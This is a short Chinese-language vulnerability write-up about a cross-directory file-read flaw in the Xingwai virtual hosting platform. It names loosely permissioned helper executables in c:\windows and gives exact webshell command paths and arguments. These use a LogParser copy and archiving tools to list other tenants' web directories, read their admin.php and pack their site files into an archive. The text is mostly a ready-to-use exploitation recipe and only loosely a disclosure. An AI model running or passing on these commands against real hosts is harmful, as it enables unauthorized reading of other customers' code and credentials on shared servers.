星外虚拟主机跨目录读取文件漏洞,需要一定条件。

详细说明:

问题发生在以下文件,这些文件都没有严格的设置执行权限,当前的IIS用户能够顺利的利用它们执行命令:

c:\windows\7i24IISLOG.exe
c:\windows\7i24IISLOG2.exe
c:\windows\7i24IISLOG3.exe
c:\windows\7i24IISLOG4.exe
c:\windows\7i24tool.exe
c:\windows\rsb.exe

其中的7i24IISLOG.exe其实就是LogParserLogParser是一款强大日志分析工具,下面利用它来列web目录:

在 webshell中

CmdPath:
c:\windows\7i24IISLOG
Argument:
“select top 100 path from e:\host\*.*” -i:FS -rtp:-1

下面读取文件内容:

c:\windows\7i24IISLOG
“select text from e:\host\0233ab\web\admin.php” -i:textline -rtp:-1

7i24IISLOG3.exe能够打包ISO文件,利用它同样的也可以列出目录文件信息:

CmdPath:
c:\windows\7i24IISLOG3
Argument:
e:\host\0233ab\web\ c:\windows\temp\123.rar

同样的还有rbs.exe

CmdPath:
c:\windows\rbs -r -v 024dbjj
Argument:
e:\host\0233ab\web\*.*